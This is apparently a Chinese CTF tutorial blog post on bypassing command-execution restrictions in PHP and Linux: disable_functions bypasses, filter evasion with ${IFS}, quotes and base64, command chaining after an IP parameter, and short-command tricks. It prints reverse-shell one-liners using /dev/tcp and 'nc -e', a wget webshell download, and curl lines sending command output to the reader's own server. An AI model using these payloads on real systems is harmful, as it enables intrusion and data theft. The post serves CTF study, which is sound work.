CTF中的命令执行绕过

本位原创作者:Smity


 

在介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区别在于,远程代码执行实际上是调用服务器网站代码进行执行,而命令注入则是调用操作系统命令进行执行。

作为CTF最基础的操作,命令执行的学习主要是为了以后进一步使用webshell打下基础

同样的,今天还会介绍如何使用各种命令执行绕过的方式

首先我们先来看代码执行

 

动态调用:

这个地方是ctf曾经的一个考点,也是我在强网杯出过的一道题目,叫"高明的黑客",里面使用的就是混淆代码+动态函数调用,这种写法实际上在红蓝攻防中很经常用到,就是一堆函数进行混淆,然后在里面插入一个动态函数进行真正的代码执行或者是命令执行。

当时那道题目的灵感是来自于一场安全响应,黑客攻陷网站后,在里头插入了混淆以后的代码,1000多个文件里面只有一条路径是正常执行的,最后是使用debug直接看栈内存的调用来判断哪个路径是真的动态调用。

1112.jpg

 

常见的命令执行函数

1113.jpg

 

反引号

1114.jpg

这个是大家很容易忘记的一个命令执行点,ctf赛题最近也出了很多道关于这个的题目。我们在第二篇中会拿一个例子来详细分析他的作用。

 

命令执行绕过

以上是我们常见的代码注入或者是命令注入的函数,但是很多时候在ctf中,出题人不会那么轻易的就让我们执行命令。因此我们必须要能够掌握多种命令执行绕过的姿势。

一般来说,遇到的无非以下两种情况:

1.disable_function

2.过滤字符

 

disable_function

这个东西很明显就是什么呢,你能够代码执行了,但是发现不论是蚁剑还是你自己手打,都执行不了系统命令,然后你用phpinfo这种函数读取后发现如下配置:

1.png

实际上是开发者在后端的php.ini里写了如下语句

 

disable_functions =system,exec,shell_exec,passthru,proc_open,proc_close, proc_get_status,checkdnsrr,getmxrr,getservbyname,getservbyport, syslog,popen,show_source,highlight_file,dl,socket_listen,socket_create,socket_bind,socket_accept, socket_connect, stream_socket_server, stream_socket_accept,stream_socket_client,ftp_connect, ftp_login,ftp_pasv,ftp_get,sys_getloadavg,disk_total_space, disk_free_space,posix_ctermid,posix_get_last_error,posix_getcwd, posix_getegid,posix_geteuid,posix_getgid, posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid, posix_getppid,posix_getpwnam,posix_getpwuid, posix_getrlimit, posix_getsid,posix_getuid,posix_isatty, posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid, posix_setpgid,posix_setsid,posix_setuid,posix_strerror,posix_times,posix_ttyname,posix_uname

 

最常用的就是两种办法

1.ld_preload

2.php_gc

 

ld_preload

今年来比较少考到,但是在红蓝攻防中很经常应用

需要对面满足条件是:对面没有禁用mail函数(可能这也是最近比赛不爱考这个的原因之一,如果禁用了mail,那等于就是考察别的点了,不禁用mail又一堆人用这个方法绕过,也很没有意思)操作方法:

 

hack.c

222.jpg

将带有命令的c文件编译成为.so文件然后通过代码执行传入(这里可以直接用蚁剑)

333.jpg

然后传入如下php文件

444.jpg

访问php文件就可以运行刚才的命令了。然后可以在/tmp/smity文件下看到ls的结果。

 

php_gc

从这两次公益赛来看这个都是考点(春秋和高校)两次的题目分别是:easy-thinking和php-uaf都是做到了代码执行却没有命令执行,所以通常步骤就是,利用蚁剑链接我们的shell代码执行,将下面的脚本写好命令传上去然后访问,利用phpgc进程Bypass 条件:php7.0 < 7.3 (Unix)

这里的大家可以参考这个博客,里面有比较详细的脚本,因为太长了就不贴在这里了

https://wulidecade.cn/2019/09/27/%E7%BB%95%E8%BF%87disable-function%E6%B1%87%E6%80%BB/

 

过滤字符

这个限制一般是题目中允许你使用system,但是很奇怪的是你却没有办法获取执行命令的结果

比如,对面过滤了空格,你能执行ls,但是没法cat读取文件

比如,对面过滤了flag这个词语,什么文件都可以读取,就是没办法读取flag

等等,都是ctf题目做到最后,这个出题人小心思故意在这里卡你一下。这个时候你就需要试试我接下来讲的这些方法:

 

空格代替

空格在bash下,可以用以下字符代替空格

555.jpg

这里解释一下${IFS},$IFS,$IFS$9的区别,首先$IFS在linux下表示分隔符,只有cat$IFSa.txt的时候,bash解释器会把整个IFSa当做变量名,所以导致没有办法运行,然而如果加一个{}就固定了变量名,同理在后面加个$可以起到截断的作用,而$9指的是当前系统shell进程的第九个参数的持有者,就是一个空字符串,因此$9相当于没有加东西,等于做了一个前后隔离。

 

截断符号

ctf很喜欢考的一点是命令执行的连接,这个地方它通常会给一个已有的命令执行,比如代码写好了ping命令,叫你填写一个ip参数这样的题目,这个时候就需要测试截断符号,将你输入的ip参数和后面要执行的命令隔开。首先测试所有的截断符号:

9999.jpg

利用截断符号配合普通命令简单问题基本就出来;例如:ip=127.0.0.1;cat /home/flag.txt这样就可以达到同时执行两条命令的效果

 

利用base编码绕过

这种绕过针对的是系统过滤敏感字符的时候,比如他过滤了cat命令,那么就可以用下面这种方式将cat先base64编码后再进行解码运行。

666.jpg

 

连接符,用两个单引号可以绕过

cat /etc/pass'w'd这个是现在很喜欢考的点之一,基本能通杀大部分命令注入waf因为单引号一旦过滤很大程度上会影响正常解题。

0.png

 

反斜杠利用

这个是很经典的hitcon题目,hitcon连续好几年出了绕过长度限制执行命令的题目

比如七个字符执行命令

七个字的命令执行

这里先介绍一下小技巧,linux下创建文件的命令可以用1>1创建文件名为1的空文件

2.png

ls>1可以直接把把ls的内容导入一个文件中,但是会默认追加\n

3.png

\ 在linux里也是个连接符,最早使用在屏幕不能容纳超过18个字符的第一代计算机,用于连接上下两行,这里使用它来绕过限制

语句为wget 域名.com -O shell.php

ls > a 写入服务器文件然后sh a 读取

这里注意.不能作为文件名的开头,因为linux下.是隐藏文件的开头,ls列不出来

然而这里还有个问题,就是ls下的文件名是按照字母顺序排序的,所以需要基于时间排序 将最后的命令改成ls -t>a

4.png

至于绕过5个字符执行命令,绕过4个字符,那其实都是用\做的trick,这里不一一赘述了。

 

命令执行结果返回长度受限制

这次在高校战役上有一道题目提醒了我这个,出题人其实能过滤的就那么多,那么还有一种方法卡住你就是不让你看到命令执行的完整结果,比如不回显或者是回显一行,这次题目需要用道soapclient做代码执行,但是它有一点不好就是没办法回显完整,只能看到一行结果,这样对我们的命令执行很不方便,而且dev文件没有权限使用,这个时候我们可以用下面这个反弹shell的办法。

其实反弹shell的命令大家很喜欢用这个:

bash -i >&/dev/tcp/ip/port0>&1

但是这个有一点不好,他需要dev也需要bash,实际上用我下面这个命令会更简单:监听端口后

nc-e /bin/bash ip port

这样也可以拿到shell,其实本质是一样的,没有太大区别,只是简化了一下。

 

一道很经典的命令执行绕过

这个题目好像看到两次了,一开始大家都不会脑洞,后来发现这次还是好多人没有学会,也没有去总结poc:

777.jpg

首先先明白这个地方限制了什么

1.限制了只能代码执行

2.限制了只能执行一个变量$x

3.限制了这个变量的长度

所以这个地方一共有两个思路

1.传入数组,让他能够执行多个变量,因为$_GET是个数组,但是这个思路是错误的,因为GET虽然能传入多个变量,但是已经限制了只能执行$x,而$x来自GET数组里键值为x的变量,所以第这个我们放弃。

2.反引号执行自己,传入$x本身,也就是说,直接让$_GET['x']=$x,这样一来 ,就会使得$x=$x,如果$x是命令,就会通过反引号自己来执行它

如果$x后面再跟上我们之前讲的连接符会是什么样呢

`$x`;abcd

那么即使取出前5个字符,还是会执行整个的$x,用上分隔符就会执行多条命令

假设我们在这里加点难度,没有回显,执行命令但是不给你结果,怎么办呢?

两种方法

1.反弹shell

2.curl

 

反弹shell,我们这里可以使用;来连接命令,

$x;nc -e /bin/bash ip port

然后在自己服务器端口 nc -lvv 8080进行监听

但是这题要是再难一点,没有权限执行反弹shell这个操作呢

我们还可以用另一种方法:

 

curl的妙用

在curl里面有这几种方式

直接ip发送get包

-d发送post包

-v 显示整个通信过程

--data发送数据

这里可以使用curl -v http://ip?whoami

或者 curl -v http://ip --datawhoami

IP为自己服务器,就可以在/var/log/apache2/access.log下看到命令执行的结果了。

posted @ 2020-04-21 09:34  合天网安实验室  阅读(6187)  评论(1编辑  收藏  举报